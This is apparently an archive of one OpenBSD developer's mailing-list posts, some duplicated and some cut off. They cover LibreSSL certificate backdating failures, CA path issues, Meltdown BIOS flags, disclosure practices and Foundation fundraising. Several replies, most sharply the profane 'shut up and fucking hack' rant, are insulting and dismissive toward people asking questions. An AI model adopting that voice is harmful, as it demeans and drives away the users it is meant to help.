Re: Libressl verify failure with 3.9.0

[Bob Beck]

> On Apr 8, 2024, at 5:44 AM, Theo Buehler  wrote:
> 
> On Sun, Apr 07, 2024 at 04:57:24PM -0500, Ted Wynnychenko wrote:
>> Hello,
>> 
>> I recently updated to -current (about a week ago).
>> 
>> I see that Libressl is at 3.9.1 just now, but I hope that won't be an issue 
>> (I did not see anything in the release notes that would impact my question).
>> ---
>> $ openssl version
>> LibreSSL 3.9.0
>> ---
>> 
>> Over the years, I have made certificates for personal servers/resources on 
>> my home network.  This is just for me, so I do some things that would be 
>> frowned on (although, technically, there is nothing "wrong" with them).
>> 
>> In this case, since I have Apple iOS devices that I want to connect to 
>> https, I backdate any certificates I create to 1/2/2019.  Apple has imposed 
>> a 300 or 800 day time limit on the validity for certificates created after 
>> (about) 7/1/2019.  Since I don't want to constantly make new certificates 
>> for my personal/home network, I have just been setting the certificates' 
>> "not before" date to early 2019.
>> 
>> Anyway, this had worked fine.
>> In fact, earlier this year (Jan 2024), I created a new certificate, and all 
>> is good.
>> 
>> A few weeks ago, I added a new thing to the network - a raspberry pi (I got 
>> as a gift about 2013 and installed a linux image from 2019 on it) that is 
>> connected to the home alarm system.
>> 
>> Since I was annoyed that my browser was constantly giving me self-signed 
>> certificate warnings, I decided to make a certificate for the nginx running 
>> on this appliance.
>> 
>> I created a key, made a csr, and then signed it with:
>> openssl ca -startdate 2019010200Z -in pi.csr -out pi.pem -config 
>> /etc/ssl/openssl.cnf


Did you create this certificate on OpenBSD with Libressl openssl? Or on linux 
or something else with an OpenSSL openssl? 


> 
> As a workaround, try using '-startdate 19010200Z' instead. I think
> this is fallout from this commit:
> 
> https://github.com/openbsd/src/commit/3feee4c53fbd67a4a480080d8ef5ae835d3fbf82
> 
> ASN1_TIME_set_string_X509() is documented as
> 
> In LibreSSL, ASN1_TIME_set_string() and ASN1_TIME_set_string_X509()
> behave identically and always set the time object to a valid value to use
> in an X.509 certificate.
> 
> It seems to me that this is just wrong (it is true that both behave
> identically because RFC5280 is defined to 0), but they do not set the
> time object to "a valid value to use in an X.509 certificate".
> 
> Confusingly, ASN1_TIME_adj_internal() actually honours its RFC5280
> parameter by behaving the expected way whereas its meaning in
> ASN1_TIME_set_string_internal() is different.
> 
> I am unsure if the bug is in my commit above or in our version of
> ASN1_TIME_set_string_X509() (or both).

> 
>> 
>> This all works fine, and a certificate is created
>> 
>> When I check with:
>> openssl x509 -text -noout -in pi.pem
>> 
>> everything seems as expected, including the not before/after dates:
>> 
>>Validity
>>Not Before: Jan  2 00:00:00 2019 GMT
>>Not After : Apr  7 15:39:59 2054 GMT
>> 
>> (yes, it is valid for 35 years - as I said before, if someone breaks into my 
>> house to secretly do things, I have way bigger problems)
>> 
>> But, if I try to verify this on the openbsd system, I get:
>> 
>> # openssl verify pi.pem
>> C = US, ST = Illinois, L = ***, O = ***, OU = ***, CN = ***
>> error 20 at 0 depth lookup:unable to get local issuer certificate
>> pi.pem: verification failed: 20 (unable to get local issuer certificate)
>> ---
>> 
>> But, if I install this on the raspberry pi, which has a much older version 
>> of openssl on it:
>> $ openssl version
>> OpenSSL 1.1.1c  28 May 2019
>> 
>> The certificate verifies without an issue:
>> $ openssl verify pi.pem
>> pi.pem: OK
>> 
>> The last time I created a certificate was in January of this year 
>> (1/22/2024).
>> I am thinking the openbsd system was using Libressl 3.8.2 at that point.
>> 
>> I created that certificate in the exact same way, backdating the start date:
>> openssl ca -startdate 2019010200Z -in 54.csr -out 54.pem -config 
>> /etc/ssl/openssl.cnf
>> 
>> This previously created certificate also has them same backdated and very 
>> long valid period:
>> 
>>Validity
>>Not Before: Jan  2 00:00:00 2019 GMT
>>Not After : Jan 21 23:49:22 2054 GMT
>> 
>> (Notice the not after date is a little different)
>> Today, with the new libressl, this certificate verifies OK.
>> 
>> $ openssl verify 54.pem
>> 54.pem: OK
>> 
>> Finally, if I create the new certificate WITHOUT backdating it
>> e.g.:  openssl ca -in pi.csr -out pi.pem -config /etc/ssl/openssl.cnf
>> 
>> The certificate is created and verifies OK.
>> 
>> So, it seems, there is some sort of issue with backdating the certificate, 
>> but not an issue with the crazy long validity window, that was not present 
>> in January of this year.
>> 
>> However, as I said, if I 

Re: ssl/libssl certificate validation broken?

[Bob Beck]

On 20 Oct 21:01, Uwe Werler wrote:
> Hi folks,
> 
> before opening a bug report I'll ask here because I want to make sure that I
> have not missed something.

You should probably submit a real bug report instead of jumping to 
conclusions on misc@

> 
> With the upgrade to 6.8 my cert validation seems to be broken because the
> hashed certs in /etc/ssl/certs are not honored anymore. I usually stored our
> L1 and L2 ca certs in /etc/ssl/certs and hashed them with "openssl certhash".
> That worked for all my machines until 6.7 but broke with 6.8. Adding the ca
> certs to /etc/ssl/cert.pem works.
> 
> Did I miss something? I guess something changed during k2k20 in "certificate
> chain validation in libcrypto"?
> 
> Thanks and with kind regards.
> 
> Uwe
> 
...
>Mmh, it seems to me that libssl is broken. After the upgrade to 6.8 my
>openldap proxies were screwed too. I configured explicitely
>
>olcTLSCACertificatePath: /etc/ssl/certs
>
>But that broke so I had to change to:

"Broke".. how?


>olcTLSCACertificateFile: /etc/ssl/cert.pem
>
>... and I had to change also /etc/openldap/ldap.conf from:
>
>TLS_CACERTDIR /etc/ssl/certs
>
>to
>
>TLS_CACERT /etc/ssl/cert.pem
>
>to keep syncrepl running.

You are a little bit thin on details here. The changes in the validator
should not affect the loading of your certificates. 

Are you using openldap from packages or something else?

So please pass on some details and perhaps a succint way to reproduce
and include the error messages you see. Probably as a real bug report
instead of misc discussions.

Re: TOFU/cert pinning in libtls

[Bob Beck]

On Sat, May 09, 2020 at 06:18:50PM +, Lucas wrote:
> Hello Stephen,
> 
> > My basic idea for the client is:
> > 
> > - load a db of self-signed certs.
> > - connect to host
> > - if host cert is self signed
> >   - if not in db, prompt user and add to db
> >   - if in db, check fingerprint and warn user if they don't match.
> > 
> > Browsing the manuals/source code, there doesn't seem to be an easy way
> > to configure this. I don't want to have to use the OpenSSL API for this
> > :(.
> 
> I experimented with cert FP pinning in the past, too. tls_peer_cert_hash
> is probably what you're looking for. Found it looking at
> /usr/include/tls.h. Then tried to find it referenced in other manpages,
> 
> oolong$ man -k Xr=tls_peer_cert_hash 
> nc(1) - arbitrary TCP and UDP connections and listens
> 
> That's far from ideal IMO, but I don't know where, of the many tls_*
> manpages, would I reference it.

man tls_peer_cert_hash

happily brings up the man page on my machines. 

Re: Suggestion: Replace Perl with Lua in the OpenBSD Base System

[Bob Beck]

read fucking code.  change fucking things. send some fucking diffs. get
fucking yelled at. learn from your fucking mistakes.  show some fucking
passion.  filter fucking misc@ and all this useless bleating into the
toilet.

none of us have time to spoon feed you in some “boot camp”

there are two types of programmers. the self taught, and the hopeless. it
is your job to turn yourself from the hopeless to the self taught.

shut up and fucking hack.


On Tue, Dec 31, 2019 at 23:50 Frank Beuth  wrote:

> On Wed, Jan 01, 2020 at 04:00:37AM +, e...@isdaq.com wrote:
> >rather than the programmer being responsible for
> >writing unsafe
> >code we need to regulate what the programmer can do just like we need to
> >regulate what the community can say, do, see, and think.
>
> where do I sign up for OpenBSD write-perfect-C-code programmer training
> bootcamp?
>
>

Re: bug tracking system for OpenBSD

[Bob Beck]

Christoph, your conversation is distracting.

Nobody gives a damn about the tool. Everyone gives a damn about the triage.

I hate to break it to you, but you are not the first person to broach
this discusson.

The only way this would work is with a dedicated team of people to
triage each area and clean it up constantly.

No such team exists.  the tool used is irrelevant


On Sun, Apr 1, 2018 at 9:44 AM, Christoph R. Murauer  wrote:
> My question was serious. I am not the enemy but I think this thing
> will only work if the people who use it accept / like to use it and so
> on.
>
>> bug tracking software is 1% of the solution.  At least 80% of the
> work is triage, and noone on this thread is serious about doing
> that.
>
>

Re: Meltdown workaround enabled?

[Bob Beck]

On Wed, Mar 14, 2018 at 05:38 Robert Paschedag <robert.pasche...@web.de>
wrote:

>
> > Gesendet: Mittwoch, 14. März 2018 um 06:13 Uhr
> > Von: "Bob Beck" <b...@obtuse.com>
> > An: "Brian Camp" <br...@thecamps.org>
> > Cc: "Theo de Raadt" <dera...@openbsd.org>, misc@openbsd.org
> > Betreff: Re: Meltdown workaround enabled?
> >
> > Intel make kitty scared...  What a fuckmess.
>
> Errdo I get it right, that a possibly vulnerable CPU
> (from 2016) is still vulnerable to MELTDOWN but a newer
> BIOS *fakes* the CPU flags so the MELTDOWN "detection code"
> says, "this CPU is NOT vulnerable"
>
> Is that right?
>
> Robert
>


Just consume the broken crap like a good citizen.  Intel is too big to fail
so thinking about these things is bad for society. Right?



> >
> > On Tue, Mar 13, 2018 at 22:57 Brian Camp <br...@thecamps.org> wrote:
> >
> > > On Tue, Mar 13, 2018 at 10:39 PM, Theo de Raadt <dera...@openbsd.org>
> > > wrote:
> > > >> According to some sources, Intel and a handful of others have known
> > > about the
> > > >> issue since February 2017(!), so perhaps it has already been
> patched in
> > > the
> > > >> 08Jan2018 BIOS. I too have doubts that to date any processor has
> been
> > > >> redesigned to avoid the flaws entirely, but then again...
> > > >
> > > > Sure.  A BIOS can change the flag bits.
> > > >
> > > > Be nice to know.  Did a BIOS change them?
> > >
> > > I downgraded the bios to try and figure this out. Going back just one
> > > revision (1/8/2018 to 12/18/2017) causes it to lose the flag and
> > > -current's MELTDOWN workaround to activate.
> > >
> > > Previous BIOS revision (12/18/2017):
> > > bcamp@nuc6cayh:~ (OpenBSD 6.3)
> > > $ cpuid 0x7
> > > eax = 0x 0""
> > > ebx = 0x2294e283 580182659"???""
> > > ecx = 0x 0""
> > > edx = 0x 0""
> > >
> > > Newest BIOS revision (1/8/2018):
> > > bcamp@nuc6cayh:~ (OpenBSD 6.3)
> > > $  cpuid 0x7
> > > eax = 0x 0""
> > > ebx = 0x2294e283 580182659"???""
> > > ecx = 0x 0""
> > > edx = 0x2c00 738197504"???,"
> > >
> > >
> >
>
>

Re: Meltdown workaround enabled?

[Bob Beck]

Intel make kitty scared...  What a fuckmess.

On Tue, Mar 13, 2018 at 22:57 Brian Camp  wrote:

> On Tue, Mar 13, 2018 at 10:39 PM, Theo de Raadt 
> wrote:
> >> According to some sources, Intel and a handful of others have known
> about the
> >> issue since February 2017(!), so perhaps it has already been patched in
> the
> >> 08Jan2018 BIOS. I too have doubts that to date any processor has been
> >> redesigned to avoid the flaws entirely, but then again...
> >
> > Sure.  A BIOS can change the flag bits.
> >
> > Be nice to know.  Did a BIOS change them?
>
> I downgraded the bios to try and figure this out. Going back just one
> revision (1/8/2018 to 12/18/2017) causes it to lose the flag and
> -current's MELTDOWN workaround to activate.
>
> Previous BIOS revision (12/18/2017):
> bcamp@nuc6cayh:~ (OpenBSD 6.3)
> $ cpuid 0x7
> eax = 0x 0""
> ebx = 0x2294e283 580182659"???""
> ecx = 0x 0""
> edx = 0x 0""
>
> Newest BIOS revision (1/8/2018):
> bcamp@nuc6cayh:~ (OpenBSD 6.3)
> $  cpuid 0x7
> eax = 0x 0""
> ebx = 0x2294e283 580182659"???""
> ecx = 0x 0""
> edx = 0x2c00 738197504"???,"
>
>

Official OpenBSD 6.2 CD set up for auction on Ebay

[Bob Beck]

So, the only 6.2 set to be produced is up for auction, featuring hand-drawn
artwork by Theo.

Artisanally Made in Canada!

All proceeds of the sale to fund OpenBSD development.

Go have a look at
http://www.ebay.ca/itm/Official-OpenBSD-6-2-CD-Set/253265944606

Official OpenBSD 6.1 CD !

[Bob Beck]

So.  There *Is* an official OpenBSD 6.1 CD

Just One.

If you are interested, please bid on ebay :

http://www.ebay.com/itm/The-only-Official-OpenBSD-6-1-CD-set-to-be-made-For-auction-for-the-project-/252910718452?hash=item3ae2a74df4:g:SJQAAOSwrhBZBqkd

(It's a pretty cool little CD set!)

Re: Why isn't OpenBSD in Google Summer of Code 2017?...

[Bob Beck]

We tried it for two years, it was too much effort on the part of the
foundation organizers mentors to deal with the bureaucracy involved, and we
didn't really see enough
return in terms of new developers to the project, which, frankly being
selfish on OpenBSD's part is the only reason for us to do it.

Both Ken Westerback and I organized our end of it and dealt with the google
paperwork the two years we did it, Neither of us is willing to do it again,
and while I won't
directly speak for Ken, I would not support us spending effort on this when
there are lots of other things to do.. It just doesn't have the benefit for
OpenBSD, especially
in light of the effort of the volunteers necessary to participate.



On Sun, Apr 2, 2017 at 8:54 AM, Luke Small  wrote:

Re: white noise about broken manpage (web) links

[Bob Beck]

You need to complain at reyk - since these web pages are not in the
openbsd www/ tree they didn't get fixed when we converted to
man.openbsd.org

On Tue, May 10, 2016 at 10:52 PM, Vivek Vinod  wrote:
> Dear Misc,
>
> I could not find a separate mailing list for openiked. Hence posting here.
>
> web manpage links appear to be broken on:
> 1) http://www.openiked.org/
> 2) http://www.openiked.org/manual.html
>
> The referenced links are
> 1A) http://www.openbsd.org/cgi-bin/man.cgi?query=isakmpd
>
> 2A) http://www.openbsd.org/cgi-bin/man.cgi/OpenBSD-current/man8/iked.8
> 2B) http://www.openbsd.org/cgi-bin/man.cgi/OpenBSD-current/man5/iked.conf.5
> 2C) http://www.openbsd.org/cgi-bin/man.cgi/OpenBSD-current/man8/ikectl.8
>
> I get a "500 Internal server error... OpenBSD httpd"
>
> Unrelated - I have gotten the same error when clicking links on 3rd
> party websites like daemonforums.org
>
> I promise to submit diffs when I am more confident of submitting them.
>
> Please ignore if trivial.
>
> Vivek

Re: ftp/www.openbsd.org will be down for an upgrade today.

[Bob Beck]

it has been back for quite some time


On Mon, May 9, 2016 at 1:02 PM, Markus Rosjat <ros...@ghweb.de> wrote:
> Hi there,
>
> just a short question about the site coming up again.
> Since our spamd-setup tries to get some blacklists form the site I was
> wondering if there is any info about the the time schedule for the
> maintenance?
>
> Regards
>
> Markus
>
>
> Am 08.05.2016 um 23:44 schrieb Stefan Wollny:
>>
>> Am 05/08/16 um 20:03 schrieb Bob Beck:
>>>
>>> There will be an extended downtime of the main ftp and www sites for
>>> an upgrade today starting in approximately one hour's time from now.
>>>
>>> The mirror sites should be unaffected - so use a mirror if you
>>> discover the main site is unavailable today.
>>>
>> Anyone know of an up2date mirror of 'current.html'?
>> (Google just found one with the latest entries from 2005...)
>> :-(
>>
>> TIA.
>>
>> STEFAN
>>
>
> --
> Markus Rosjatfon: +49 351 8107223mail: ros...@ghweb.de
>
> G+H Webservice GbR Gorzolla, Herrmann
> Königsbrücker Str. 70, 01099 Dresden
>
> http://www.ghweb.de
> fon: +49 351 8107220   fax: +49 351 8107227
>
> Bitte prüfen Sie, ob diese Mail wirklich ausgedruckt werden muss! Before
you
> print it, think about your responsibility and commitment to the ENVIRONMENT

Re: TLS now supported on openbsd.org?

[Bob Beck]

>It's great to see OpenBSD Project supporting Let's Encrypt.

I am absolutely not supporting Let's Encrypt. The client scares the
shit out of me, and shows me how low the bar
has become. Considering all I need is put something on a web site that
I can convince a DNS server is the one they'll check, well, that's
pretty darn bad - you'd all probably be a lot better off pinning
self-signed certs.


> It is really nice to finally see TLS on openbsd.org. How about redirecting
> http to https?

And statements like this - and people that think this is a good idea,
are why I spoof DNS answers in bars and coffee shops, and why I don't
read misc@.  This is never a good idea, unless you want the
connections intercepted and MITM'ed.

ftp/www.openbsd.org will be down for an upgrade today.

[Bob Beck]

There will be an extended downtime of the main ftp and www sites for
an upgrade today starting in approximately one hour's time from now.

The mirror sites should be unaffected - so use a mirror if you
discover the main site is unavailable today.

Thanks
-Bob

Re: WAPBL?

[Bob Beck]

I would hazard a guess that if you are running a random diff, the
problem is with the diff you are running - not those other things.

On Fri, Apr 1, 2016 at 9:30 AM, Amit Kulkarni <amitk...@gmail.com> wrote:
> I see the writes are not being done to disk in case of a simple cvs update,
> and the machine locks up for a solid couple of minutes afterwards also. This
> happens in a dual CPU config with plenty of free memory, even with stefan,
> mpi and kettenis recent diffs. For a curious kernel reader, where could the
> bug(s) be? in amap, uvm/buffer cache, rthreads???
>
> Thanks in advance
>
>
> On Fri, Apr 1, 2016 at 9:06 AM, Bob Beck <b...@obtuse.com> wrote:
>>
>> I have more up to date versions of these patches around here.
>>
>> The problem with them is that fundamentally, the WAPBL implementation
>> as it is assumes that it may infinitely steal
>> buffers from the buffer cache and hold onto them indefinitely - and it
>> assumes it can always get buffers from it. While the patch as it sits
>> may "work" in the "happy case" on many people's machines, as it sits
>> today it is dangerous and can lock up your machine and corrupt things
>> in low memory situations.
>>
>> Basically in order to progres WAPBL (renamed "FFS Journalling" here)
>> needs to have a mechanism added to allow
>> it be told "no it can't have a buffer" and let it deal with it
>> correctly.  The first part is done, the latter part is complex.
>>
>>
>> On Sat, Mar 26, 2016 at 1:27 PM, Martijn Rijkeboer <mart...@bunix.org>
>> wrote:
>> > Hi,
>> >
>> > Just out of curiosity, what has happend with WAPBL? There were some
>> > patches
>> > floating around on tech@ in the last months of 2015, but then it became
>> > quiet. I'm not complaining just curious.
>> >
>> > Kind regards,
>> >
>> >
>> > Martijn Rijkeboer

Re: WAPBL?

[Bob Beck]

I have more up to date versions of these patches around here.

The problem with them is that fundamentally, the WAPBL implementation
as it is assumes that it may infinitely steal
buffers from the buffer cache and hold onto them indefinitely - and it
assumes it can always get buffers from it. While the patch as it sits
may "work" in the "happy case" on many people's machines, as it sits
today it is dangerous and can lock up your machine and corrupt things
in low memory situations.

Basically in order to progres WAPBL (renamed "FFS Journalling" here)
needs to have a mechanism added to allow
it be told "no it can't have a buffer" and let it deal with it
correctly.  The first part is done, the latter part is complex.


On Sat, Mar 26, 2016 at 1:27 PM, Martijn Rijkeboer  wrote:
> Hi,
>
> Just out of curiosity, what has happend with WAPBL? There were some patches
> floating around on tech@ in the last months of 2015, but then it became
> quiet. I'm not complaining just curious.
>
> Kind regards,
>
>
> Martijn Rijkeboer

But wait, there's more.. another 5.8 song!

[Bob Beck]

Coming soon to http://www.openbsd.org/lyrics.html is the next 5.8
release song "A Year In The Life".

I seem to have this bad habit of talking to Theo about release
themes when drinking alcohol, and it brings out the poet (My
inner Weird Al) in me.   Then I get cajoled into finishing the Opus
before release time.

We've done stuff about LibreSSL before, but this particular song just
fit with the release theme. While the lyrics can speak for themselves,
"A Year In The Life" is representative of more than just LibreSSL. The
pattern of LibreSSL development is a pattern that has repeated itself
many times in OpenBSD -- a decision is made by a few people to do
something, followed by action, and letting the world share it if they
like it (such as with OpenSSH). To the developers actually doing the
work, reactions to such efforts can often seem surreal, or
irrelevant. The juxtaposition of working on the very real with the
surreal going on around you can often make working on such projects
feel like you're in a bit of an altered reality..  Sort of like the
song. A number of us have had many years like this in the last 20.


Anyhow, please enjoy

-Bob

BitCoin donations to the OpenBSD Foundation.

[Bob Beck]

We've recently noticed a few attempts at larger Bitcoin donations to
the OpenBSD Foundation.

Due to the nature of these, we don't actually know who is attempting
to donate, so I'm posting here.

Due to changing laws, our provider (BitPay) had to limit transactions
to $1000/day causing these donations to fail (according to what we
received from BitPay the potential donor would have been told this).

As of a few hours ago, we have managed to get the limit raised to
$1/day - and a note of this
is now reflected at

http://www.openbsdfoundation.org/donations.html

If you are attempting to donate a sizable amount of BitCoin, please
bear the limit in mind when donating.. Donations of more than $1
in value would need to be made over multiple days.

Sorry for any inconvenience, this is just how these things work.

-Bob

Re: OpenSSL vulnerabilities coming on the 19th

[Bob Beck]

And while I will reiterate, stop mailing us privately and asking, I
can confirm that the situation has changed, and core LibreSSL
developers have now had disclosure from OpenSSL.   We will be keeping
discusssion of all details strictly to that group until such time as
OpenSSL releases publicly.

-Bob


On Mon, Mar 16, 2015 at 2:52 PM, Theo de Raadt dera...@cvs.openbsd.org wrote:
 Please people stop mailing me privately and asking.  (Probably bugging
 other people in the group as well).

 The OpenSSL group do not tell the LibreSSL group about vulnerabilities
 that they are fixing in upcoming releases.

 Why?  Well, they just don't.  That's the whole story.

 Hopefully the LibreSSL team has been aggressive enough at cleaning
 house, and the issue is already resolved in LibreSSL.

 Wait and see.

Re: a thankyou to OpenBSD

[Bob Beck]

Wave.. Thanks Diana.

I still owe you a beer or thirteen.

On Tue, Feb 10, 2015 at 5:26 PM, Diana Eichert deich...@wrench.com wrote:
 I don't post much any more, my OpenBSD systems just work.

 Just wanted to post a thank you to OpenBSD because it does
 just work.

 My day job entails a lot of Linux support, lately I've been
 dealing with the big screwup associated with network interface
 naming.  WHY can't Linux follow BSD's straightforward NIC
 naming?  It's positively bizarre all the crappy little files
 and utilities they have come up with so you can munge NIC
 names to something more useful than p3p2!!!.

 In appreciation I just sent in a donation via the OpenBSD
 donation page.

 g.day

 fade to black
 diana



 Past hissy-fits are not a predictor of future hissy-fits.
 Nick Holland(06 Dec 2005)

Re: new OpenSSL flaws

[Bob Beck]

We are not on a linux distros mailing list, because we are not a linux
distribution. And this private mailing list is not really an
acknowledged conduit for vulnerability release.

I was asked by someone privately if *I* would be on that mailing list
on June 2nd.

I said I would consider it, but as I felt the list was not being used
for advanced disclosure in a practical means, I didn't see the reason
for it. - but I would be open
to it if it was being used for advanced disclosure.. my words on june
2 ended with:

In a nutshell, I suppose I'm asking you - does this help if the list only gets 
notification at the same time, basically, as public release?

Or are there some rules for participants?

The reply I got said they couldn't give any details because there were
not any - so obviously as of June 2, someone who was on and maintained
that list did
not feel that there was any need to be on the list for advance
disclosure of bugs.

For the record, we didn't get advance notice of Heartbleed either, so
this is nothing new.




On Thu, Jun 5, 2014 at 2:43 PM, Martin, Matthew phy1...@utdallas.edu wrote:
 That's exactly my though. Specially, because FreeBSD and NetBSD were
 warned, but not OpenBSD. If this was only a rant or any childish
 behavior from them, it's something stupid and, of course, not the right
 thing to do. But hey, we're all human. My real concern is if this
 something else, a hidden agenda, in that this stupid disclosure was
 indeed, carefully planed. One can never have too many conspiracy
 theories. Specially after what has been happening the last year. Thanks
 for the clarification.

 Mark Cox claims that the reason OpenBSD was not told is because OpenBSD
 is not on the distros mailing list and if we were then they'd be able
 to work with other distros on issues in advance.

 It's at http://oss-security.openwall.org/wiki/mailing-lists/distros .

 Not saying I believe or disbelieve him, but it can't hurt to join even
 if it is only until 5.6 comes out.

 - Matthew Martin

Re: new OpenSSL flaws

[Bob Beck]

I may also remind people that those lists are acknowledged right at the top
as experimental.  They also do not allow for non personal subscriptions, so
they aren't very practical for this.  What if I was away for a day or
three..  Or more..  Essentially this is a nice experiment, but not really a
practical means of early disclosure. Nor were we informed it was anything
beyond experimental.
On 5 Jun 2014 17:39, Stuart Henderson s...@spacehopper.org wrote:

 On 2014/06/05 20:43, Martin, Matthew wrote:
   That's exactly my though. Specially, because FreeBSD and NetBSD were
   warned, but not OpenBSD. If this was only a rant or any childish
   behavior from them, it's something stupid and, of course, not the right
   thing to do. But hey, we're all human. My real concern is if this
   something else, a hidden agenda, in that this stupid disclosure was
   indeed, carefully planed. One can never have too many conspiracy
   theories. Specially after what has been happening the last year. Thanks
   for the clarification.
 
  Mark Cox claims that the reason OpenBSD was not told is because OpenBSD
  is not on the distros mailing list and if we were then they'd be able
  to work with other distros on issues in advance.

 The distros and linux-distros lists are a good way to contact *some*
 OS distributions and Amazon.

 http://oss-security.openwall.org/wiki/mailing-lists/distros

 But there are clearly a number of others for whom an OpenSSL bug
 would have big impact who are not on that list (OS such as OpenBSD
 and Apple, large scale hosting providers, etc). Many of these are
 listed on the security contacts page on the wiki, and actually, the
 page with information about sending to the distros list (which
 submitters cannot ignore as it has the required pgp key) says:

 Please notify upstream projects/developers of the
 affected software, other affected distro vendors link to
 http://oss-security.openwall.org/wiki/vendors, and/or
 affected Open Source projects before notifying one of these
 mailing lists in order to ensure that these other parties
 are OK with the maximum embargo period that would apply.

Re: panic: softdep_deallocate_dependencies

[Bob Beck]

I'll be taking a peek based on what I see in his traceback.  Travelling at
the moment.
On 9 May 2014 06:44, Philip Guenther guent...@gmail.com wrote:

 On Thu, May 8, 2014 at 8:14 PM, STeve Andre' and...@msu.edu wrote:

  On 05/08/14 22:43, Philip Guenther wrote:
 
  On Thu, May 8, 2014 at 2:59 PM, STeve Andre' and...@msu.edu wrote:
 
   Twice now in three or so weeks, I've gotten a panic on my
 -current_amd64
  W500 laptop.  I've updated my tree several times during this time, and
  have
  not seen other problems besides the known acpi heat problem.
 
   Uh, what was the date of the cvs update of your kernel build when they
  started?  What was the cvs update date of your kernel before *that*?
   (I.e,
  what's your best estimate of the window in which the change to the
 kernel
  which triggered the panic occurred?
 
  (What, you don't keep a log of the timestamps of your kernel
  updates+builds?  Doesn't everyone?)
 
 
  Actually, I do keep past kernels so I have the build date for them.
  I *thought* I had some notes on when this started but I am
  ashamed to see that I didn't put them in a safe place.


 Well, make your best, but conservative estimate of the window in which it
 started.  (Certainly after _that_ kernel; not sure if before _this_ kernel
 but certainly before this+1...)

 I have both firefox and chrome running but I'm getting the feeling that
 
  things
  get more weird as I use lots of tabs in chrome.
 
   You're pushing the vm subsystem enough to page.  Since you have 8GB, I
  wonder if you've raised yourkern.bufcachepercent, thus pushing on it
  harder.
 
 
  Nope, I try to avoid the knobs when possible.  It's been at 20%
  ever since (bob?) raised it to 20%.
 

 Ok.  I guess it's just memory pressure from chrome.



  I don't think I'm swapping?  At least I haven't seen top tell me that.
 

  ...In the past (like a year+) ago, there were times when chrome
  went crazy with memory and I did swap.  But chrome has gotten
  better--I don't think I've seen it do that for some time now.


 Heh, the backtrace starts from uvm_pageout so yes, it decided to page
 something out.  :-)



   I'm not sure how well I can pin this down.  If I go too far back with
  an older kernel I'll be out of sync with userland.  Any suggestions
  on how to test this more?
 

 I don't recall any kernel ABI changes in the window, but hold off for now.
  Eyes more familiar with the involved subsystem may consider the backtrace
 you gave (thanks!) enough.


 Philip Guenther

Re: OpenBSD Foundation 2014 Fundraising Campaign.

[Bob Beck]

On the web site at www.openbsdfoundation.org.

On Fri, Apr 11, 2014 at 10:15 AM, trifle menot trifleme...@gmail.com wrote:
 On 4/10/14, Bob Beck b...@openbsdfoundation.org wrote:

 The Foundation will continue to strive to improve its financial
 resources, and hopes to be able to provide further support to the
 projects in the future. Please continue to contribute!

 Where can I read your financial reports?

OpenBSD Foundation 2014 Fundraising Campaign.

[Bob Beck]

The OpenBSD Foundation is happy to report that the $150,000 goal of the 2014
fundraising campaign has been reached. 

We wish to thank our contributors large and small. We will continue
our fundraising efforts both in the current year and next year.

The success of this year's effort has allowed the Foundation to
reverse the recent decline in the support we were able to offer the
OpenBSD project. The Foundation has been able to assume responsibility
for funding more aspects of the project infrastructure, such as the
server electricity bill.

The Foundation is now able to support efforts underway to rebuild a
significant part of the project server infrastructure. This included a
few things that were, literally, rotting.

2014's slate of hackathons has been solidified, ensuring these critical
events will continue to provide a stream of improvements to the OpenBSD
and related projects.

We would like to especially thank the contributors who have made
commitments for continuing donations to the Foundation. Every
recurring regular donation allows us to budget and plan more
effectively.

The Foundation will continue to strive to improve its financial
resources, and hopes to be able to provide further support to the
projects in the future. Please continue to contribute!

Re: OpenBSD Website, multilanguage faq

[Bob Beck]

Well if you're going to have your thousand hands, perhaps they could
just do one word at a time, in one language, and pretty soon we'll
morph into something that isn't english and you'll all be a happy
little umama ofebayo

I'll even start, as I looked in the kernel for a phrase to change, and
the only place it appeared happened to be in a file I commit to
regularly, so therefore I'll submit the following kernel change to
start your noble new effort:

Index: kern/vfs_bio.c
===
RCS file: /cvs/src/sys/kern/vfs_bio.c,v
retrieving revision 1.154
diff -u -p -u -p -r1.154 vfs_bio.c
--- kern/vfs_bio.c  25 Jan 2014 04:23:31 -  1.154
+++ kern/vfs_bio.c  4 Apr 2014 00:53:55 -
@@ -856,7 +856,7 @@ incore(struct vnode *vp, daddr_t blkno)

 /*
  * Get a block of requested size that is associated with
- * a given vnode and block offset. If it is found in the
+ * a given vnode and block offset. If it butholakala in the
  * block cache, mark it as having been found, make it busy
  * and return it. Otherwise, return an empty block of the
  * correct size. It is up to the caller to ensure that the

Google Summer Of Code 2014.

[Bob Beck]

The OpenBSD Foundation is pleased to announce that we have been
accepted as a mentoring organization for Google Summer of Code 2014.
As such if you are a student who qualifies to apply for GSOC, you will
be able to find us in Google's Summer of Code Application process.

We have an ideas page which is located at
http://www.openbsdfoundation.org/gsoc2014.html

I will repeat my usual disclaimer here on behalf of the foundation -
doing anything with GSOC does *not* guarantee the result will end up
in OpenBSD or any related project. That having been said
we hope to be able to put some mentors together with students to
accomplish things that may become useful to the community at large.

This will be our first year doing this, so we hope to learn from the
experience and see if it will work out in future years.

-Bob Beck - The OpenBSD Foundation.

asdasd

[Bob Beck]

Greetings All,

About a week ago I warned you all that the OpenBSD project did not
have the funds to cover our bills for the past year (especially the
ability to handle the electricity) and that our funding sources were
not sustainable.

As most of you know the news of our predicament has been widely
distributed over the last week, and the response from the community as
well as corporate donors has been significant - some of this response
has been hitting the internet media already.

To all of you who have donated, please allow me to give you a huge
Thank You.  In a nutshell, we have in one week gone from being in a
dire situation to having a commitment of approximately $100,000 in
donations to the foundation. From a developer's perspective let me
assure you that this reaffirms the worth of what we are supporting and
makes us want to work on it that much more.

We would like to continue to build on your groundswell of support, and
have set a target for $150,000 this year in fundraising.  Please see

http://www.openbsdfoundation.org/campaign2104.html

If you have contributed already - Thank you!
If you can help us by contributing - Please do.
If you know or work for someone who can help us reach our goals,
please contact us.

Sincerely,

-Bob

OpenBSD Foundation Fundraising for 2014

[Bob Beck]

Greetings All,

About a week ago I warned you all that the OpenBSD project did not
have the funds to cover our bills for the past year (especially the
ability to handle the electricity) and that our funding sources were
not sustainable.

As most of you know the news of our predicament has been widely
distributed over the last week, and the response from the community as
well as corporate donors has been significant - some of this response
has been hitting the internet media already.

To all of you who have donated, please allow me to give you a huge
Thank You.  In a nutshell, we have in one week gone from being in a
dire situation to having a commitment of approximately $100,000 in
donations to the foundation. From a developer's perspective let me
assure you that this reaffirms the worth of what we are supporting and
makes us want to work on it that much more.

We would like to continue to build on your groundswell of support, and
have set a target for $150,000 this year in fundraising.  Please see

